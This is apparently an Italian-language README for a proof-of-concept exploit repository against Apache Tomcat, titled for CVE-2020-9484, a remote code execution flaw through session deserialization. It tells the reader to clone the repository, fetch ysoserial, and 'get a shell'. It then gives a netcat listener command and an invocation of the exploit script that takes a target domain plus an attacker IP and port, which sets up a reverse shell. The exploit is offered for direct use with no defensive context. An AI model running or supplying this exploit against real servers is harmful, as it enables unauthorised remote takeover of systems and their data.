
POC per CVE-2020-9484
POC per CVE-2020-9484
Apache Tomcat RCE tramite deserializzazione (CVE-2020-9484)
Esplora la documentazione »
1. Clona questo repository, poi potrai usare CVE-2020-9484 e modificare il codice sorgente se necessario.
2. Scarica ysoserial jar
3. posiziona sia CVE-2020-9484 che ysoserial.jar nella stessa directory
4. ottieni una shell!
Un semplice script bash è stato scritto per rendere più fluido l'utilizzo di CVE-2020-9484.
Durante lo sfruttamento avrai bisogno di un listener netcat pronto
nc -lvnp $port
./CVE-2020-9484.sh domain attacker-ip attacker-port
